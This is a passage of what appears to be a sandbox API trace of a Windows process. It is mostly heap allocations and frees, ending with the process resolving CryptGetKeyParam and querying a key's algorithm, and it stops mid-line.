[0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0172.516] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0172.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0172.517] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0172.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0172.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0172.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0172.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0172.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0172.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0172.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0172.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0172.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0172.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0172.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0172.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.518] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0172.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0172.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0172.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0172.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0172.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0172.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0172.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0172.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0172.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0172.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0172.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0172.519] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0172.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0172.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0172.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0172.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0172.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0172.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0172.520] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0172.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0172.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd900 [0172.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0172.520] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0172.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0172.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0172.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0172.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0172.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0172.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0172.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0172.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0172.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0172.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0172.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0172.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0172.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0172.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0172.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0172.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0172.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0172.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0172.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0172.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0172.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0172.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0172.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0172.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0172.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0172.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0172.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0172.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0172.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0172.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0172.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0172.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0172.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0172.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0172.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0172.524] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0172.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0172.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0172.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0172.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0172.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.526] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0172.526] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2748, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2748*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: 